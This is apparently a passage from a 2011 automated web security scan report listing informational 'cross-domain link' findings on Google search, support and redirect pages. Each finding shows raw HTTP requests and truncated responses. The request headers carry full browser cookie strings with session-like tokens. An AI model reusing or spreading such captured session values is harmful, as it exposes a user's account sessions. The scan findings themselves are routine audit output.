<h3 class="r"><a href="http://www.claymath.org/" class=l onmousedown="return clk(this.href,'','','','8','','0CEgQFjAH')">Clay <em>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/index.html" class=l onmousedown="return clk(this.href,'','','','9','','0CE0QFjAI')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.mlnm.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CFYQFjAJ')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/index.html" class=l onmousedown="return clk(this.href,'','','','11','','0CF0QFjAK')">Downtown <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CF8QIDAK')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" onmousedown="return clk(this.href,'','','','11','','0CGAQqwMoADAK')">Specials & Packages</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/restaurant/" onmousedown="return clk(this.href,'','','','11','','0CGEQqwMoATAK')">Restaurants & Bars</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/rooms/" onmousedown="return clk(this.href,'','','','11','','0CGIQqwMoAjAK')">Guest Rooms</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/gallery/index.html" onmousedown="return clk(this.href,'','','','11','','0CGMQqwMoAzAK')">Take a Picture Gallery Tour</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/attractions/" onmousedown="return clk(this.href,'','','','11','','0CGQQqwMoBDAK')">Location & Attractions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/facilities/" onmousedown="return clk(this.href,'','','','11','','0CGUQqwMoBTAK')">Facilities</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html" onmousedown="return clk(this.href,'','','','11','','0CGYQqwMoBjAK')">Bed & Breakfast Package</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html" onmousedown="return clk(this.href,'','','','11','','0CGcQqwMoBzAK')">Banquets & Meetings</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html" class=l onmousedown="return clk(this.href,'','','','12','','0CGoQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CG0QIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" class=l onmousedown="return clk(this.href,'','','','13','','0CG8QFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CHEQIDAM')">Cached</a>
...[SNIP]...

17.278. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=GMWJ_5AKtpypmg8&sa=X&oi=&ct=image&resnum=5&ved=0Csearch?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=bks:1&source=og&sa=N&tab=wp

The response contains the following link to another domain:

http://www.youtube.com/results?hl=en&resnum=5&q=p&um=1&ie=UTF-8&sa=N&tab=p1

Request

GET /search?hl=en&q=GMWJ_5AKtpypmg8&sa=X&oi=&ct=image&resnum=5&ved=0Csearch?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=bks:1&source=og&sa=N&tab=wp HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

17.279. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=millenium+park+boston&revid=97111807&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CM0BENUCKAA

The response contains the following links to other domains:

http://gocitykids.parentsconnect.com/attraction/millennium-park-vfw-highway-gardner-street-west-roxbury-ma-02132-us
http://miniatures.kitingusa.com/loc/millenium.pdf
http://outside.in/brook-farm-boston-ma/millenium-park
http://webcache.googleusercontent.com/search?q=cache:51egLZtLH0YJ:www.findsportsnow.com/sports/listing/3092/boston-neighborhood-soccer-league-bnsl-at-millennium-park+millenium+park+boston&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:FRaewWMb4A4J:www.yelp.com/biz/millennium-park-west-roxbury+millenium+park+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Jh1DeI6zFoAJ:www.newtonconservators.org/34millennium.htm+millenium+park+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NzD55Mn_E2wJ:www.panoramio.com/photo/10492774+millenium+park+boston&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Prb9nTKCJe8J:www.cityofboston.gov/parks/urbanwilds/DumpShoreline.asp+millenium+park+boston&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:fUvZ3VtWqucJ:www.tripadvisor.com/Travel-g60745-c4893/Boston:Massachusetts:Millenium.Park.West.Roxbury.html+millenium+park+boston&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:hklPpUTgARgJ:outside.in/brook-farm-boston-ma/millenium-park+millenium+park+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:k_3IuOMLY9cJ:wikimapia.org/1190493/Millenium-Park+millenium+park+boston&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:lzubCxNmqiQJ:gocitykids.parentsconnect.com/attraction/millennium-park-vfw-highway-gardner-street-west-roxbury-ma-02132-us+millenium+park+boston&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://wikimapia.org/1190493/Millenium-Park
http://www.cityofboston.gov/parks/urbanwilds/DumpShoreline.asp
http://www.findsportsnow.com/sports/listing/3092/boston-neighborhood-soccer-league-bnsl-at-millennium-park
http://www.newtonconservators.org/34millennium.htm
http://www.panoramio.com/photo/10492774
http://www.tripadvisor.com/Travel-g60745-c4893/Boston:Massachusetts:Millenium.Park.West.Roxbury.html
http://www.yelp.com/biz/millennium-park-west-roxbury
http://www.youtube.com/results?hl=en&q=millenium+park+boston&revid=97111807&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=millenium+park+boston&revid=97111807&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CM0BENUCKAA HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium park boston - Google Search</title><script>window.google={kEI:"xnxJTbmTGcKBlAfj-s3fDw",kEXPI:"172
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=millenium+park+boston&revid=97111807&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.newtonconservators.org/34millennium.htm" class=l onmousedown="return clk(this.href,'','','','2','','0CBkQFjAB')">Newton Conservators - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Jh1DeI6zFoAJ:www.newtonconservators.org/34millennium.htm+millenium+park+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CBsQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yelp.com/biz/millennium-park-west-roxbury" class=l onmousedown="return clk(this.href,'','','','3','','0CBwQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FRaewWMb4A4J:www.yelp.com/biz/millennium-park-west-roxbury+millenium+park+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CB8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cityofboston.gov/parks/urbanwilds/DumpShoreline.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CCEQFjAD')">Dump Shoreline (Part of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Prb9nTKCJe8J:www.cityofboston.gov/parks/urbanwilds/DumpShoreline.asp+millenium+park+boston&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CCMQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://wikimapia.org/1190493/Millenium-Park" class=l onmousedown="return clk(this.href,'','','','5','','0CCUQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:k_3IuOMLY9cJ:wikimapia.org/1190493/Millenium-Park+millenium+park+boston&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CCcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Travel-g60745-c4893/Boston:Massachusetts:Millenium.Park.West.Roxbury.html" class=l onmousedown="return clk(this.href,'','','','6','','0CCkQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fUvZ3VtWqucJ:www.tripadvisor.com/Travel-g60745-c4893/Boston:Massachusetts:Millenium.Park.West.Roxbury.html+millenium+park+boston&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CCsQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.panoramio.com/photo/10492774" class=l onmousedown="return clk(this.href,'','','','7','','0CC0QFjAG')">Panoramio - Photo of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NzD55Mn_E2wJ:www.panoramio.com/photo/10492774+millenium+park+boston&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CC8QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://miniatures.kitingusa.com/loc/millenium.pdf" class=l onmousedown="return clk(this.href,'','','','8','','0CDAQFjAH')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.findsportsnow.com/sports/listing/3092/boston-neighborhood-soccer-league-bnsl-at-millennium-park" class=l onmousedown="return clk(this.href,'','','','9','','0CDQQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:51egLZtLH0YJ:www.findsportsnow.com/sports/listing/3092/boston-neighborhood-soccer-league-bnsl-at-millennium-park+millenium+park+boston&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CDYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://gocitykids.parentsconnect.com/attraction/millennium-park-vfw-highway-gardner-street-west-roxbury-ma-02132-us" class=l onmousedown="return clk(this.href,'','','','10','','0CDgQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lzubCxNmqiQJ:gocitykids.parentsconnect.com/attraction/millennium-park-vfw-highway-gardner-street-west-roxbury-ma-02132-us+millenium+park+boston&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CDoQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://outside.in/brook-farm-boston-ma/millenium-park" class=l onmousedown="return clk(this.href,'','','','11','','0CDwQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hklPpUTgARgJ:outside.in/brook-farm-boston-ma/millenium-park+millenium+park+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CD4QIDAK')">Cached</a>
...[SNIP]...

17.280. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=static+2mdn+net&channel=linkdoctor

The response contains the following link to another domain:

http://www.robtex.com/dns/static.2mdn.net.html

Request

GET /search?q=static+2mdn+net&channel=linkdoctor HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://sorry.google.com/sorry/Captcha?continue=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dstatic%2B2mdn%2Bnet%26channel%3Dlinkdoctor&id=4050288757061532411&captcha=coestful&submit=Submit
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: GeNLY2f-
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; GZ=Z=0; S=sorry=6N0zPerLQtaqcOPwyzNvWg; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:28:07 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 18090

MsNN-Rbk....S....Y.....Y...v.....g.+<!doctype html><head><title>static 2mdn net.4...[F4ZJTbH4CcWBlAffn83hDw",kEXPI:"17259,17291,27615,27683,28068,28187,28387,28402",kCSI:{e:"17259,17291,27615,27683,28
...[SNIP]...
</a> - <a href="http://www.robtex.com/dns/static.2mdn.net.html#records" s- .e3','','0CCoQ0gIoATAC')">Records</a> - <a href="http://www.robtex.com/dns/static.2mdn.net.html#graph" s- .d3','','0CCsQ0gIoAjAC')">Graph</a> - <a href="http://www.robtex.com/dns/static.2mdn.net.html#shared" s- ..3','','0CCwQ0gIoAzAC')">Shared#"....8robtex.com/dns/<b>
...[SNIP]...

17.281. http://www.google.com/support/chrome/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/chrome/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/support/chrome/bin/answer.py?answer=95671&hl=en

The response contains the following links to other domains:

http://chrome.blogspot.com/
http://googlechromereleases.blogspot.com/?source=ln
http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&tt=%22Oops%21+This+link+appears+broken.%22
http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&n=%22Oops%21+This+link+appears+broken.%22
http://www.facebook.com/googlechrome
http://www.google-analytics.com/ga.js
http://www.whatbrowser.org/
http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&&enablejsapi=1&playerapiid=WhatIsBrowserDownload

Request

GET /support/chrome/bin/answer.py?answer=95671&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; GZ=Z=0; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D138fb5d3087d487f%26v%3D2%26c%3De93dbe18%26s%3D4d4a319a%26t%3DA%3A0%3A95671%26sessref%3D; Expires=Thu, 03-Feb-2011 05:09:55 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 04:39:55 GMT
Expires: Thu, 03 Feb 2011 04:39:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
<li class="LeftNav_HelpCenterReleaseNotes first">
<a href="http://googlechromereleases.blogspot.com/?source=ln" onclick="track('LeftNav', 'HelpCenterReleaseNotes');">Google Chrome release notes</a>
...[SNIP]...
<li class="LeftNav_HelpCenterBlog">
<a href="http://chrome.blogspot.com" onclick="track('LeftNav', 'HelpCenterBlog');">Google Chrome blog</a>
...[SNIP]...
<li class="LeftNav_Facebook">
<a href="http://www.facebook.com/googlechrome" onclick="track('LeftNav', 'Facebook');">Chrome on Facebook</a>
...[SNIP]...
<li class="LeftNav_HelpCenterBrowser">
<a href="http://www.whatbrowser.org/" onclick="track('LeftNav', 'HelpCenterBrowser');">Whatbrowser.org</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);">
<a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&n=%22Oops%21+This+link+appears+broken.%22"
onclick="track('Page Actions',
'Share - Blogger')"
target="_blank">Blogger</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);">
<a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&tt=%22Oops%21+This+link+appears+broken.%22"
onclick="track('Page Actions',
'Share - Orkut')"
target="_blank">Orkut</a>
...[SNIP]...
<center>
<object type="application/x-shockwave-flash" data="http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&%26enablejsapi=1%26playerapiid=WhatIsBrowserDownload" width="280"
height="180" id="WhatIsBrowserDownload">
<param name="src" value="http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&%26enablejsapi=1%26playerapiid=WhatIsBrowserDownload" />
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'></script>
...[SNIP]...

17.282. http://www.google.com/support/websearch/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/websearch/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/support/websearch/bin/answer.py?hl=en&answer=186645

The response contains the following link to another domain:

http://www.google-analytics.com/ga.js

Request

GET /support/websearch/bin/answer.py?hl=en&answer=186645 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D4355fd2894b87b72%26v%3D2%26c%3D59402611%26s%3D4d497dc3%26t%3DA%3A0%3A186645%26sessref%3D; Expires=Wed, 02-Feb-2011 16:22:35 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:52:35 GMT
Expires: Wed, 02 Feb 2011 15:52:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'></script>
...[SNIP]...

17.283. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?url=http://www.virtualtourist.com/travel/North_America/United_States_of_America/Massachusetts/TravelGuide-Massachusetts.html&rct=j&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CJcBEOkFKAA&q=millenium+boston&usg=AFQjCNHFkjBF9xt239tNDy6Qv5UwRZpRyQ

The response contains the following link to another domain:

http://www.virtualtourist.com/travel/North_America/United_States_of_America/Massachusetts/TravelGuide-Massachusetts.html

Request

GET /url?url=http://www.virtualtourist.com/travel/North_America/United_States_of_America/Massachusetts/TravelGuide-Massachusetts.html&rct=j&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CJcBEOkFKAA&q=millenium+boston&usg=AFQjCNHFkjBF9xt239tNDy6Qv5UwRZpRyQ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:46:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<body><a href="http://www.virtualtourist.com/travel/North_America/United_States_of_America/Massachusetts/TravelGuide-Massachusetts.html" id=link target=_parent></body><script>var a=parent,b=parent.goo
...[SNIP]...

17.284. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=4&ved=0CC4QFjAD&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&ei=JYZJTdvwDsKBgAe-79TsDw&usg=AFQjCNHrqUvo-7wkCH5cLUgDllJXe6Eb1w

The response contains the following link to another domain:

http://www.robtex.com/dns/2mdn.net.html

Request

GET /url?sa=t&source=web&cd=4&ved=0CC4QFjAD&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&ei=JYZJTdvwDsKBgAe-79TsDw&usg=AFQjCNHrqUvo-7wkCH5cLUgDllJXe6Eb1w HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; GZ=Z=0; S=sorry=6N0zPerLQtaqcOPwyzNvWg; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7

Response

HTTP/1.1 302 Found
Location: http://www.robtex.com/dns/2mdn.net.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:28:48 GMT
Server: gws
Content-Length: 236
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.robtex.com/dns/2mdn.net.html">here</A>
...[SNIP]...

17.285. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=8&ved=0CE0QFjAH&url=http%3A%2F%2Fwww.threatexpert.com%2Freport.aspx%3Fmd5%3D57eb54a5e3fe2c152c3e438277376933&ei=JYZJTdvwDsKBgAe-79TsDw&usg=AFQjCNGsGlQtzjaMQGwZ73n9GL-pHTs9Yw

The response contains the following link to another domain:

http://www.threatexpert.com/report.aspx?md5=57eb54a5e3fe2c152c3e438277376933

Request

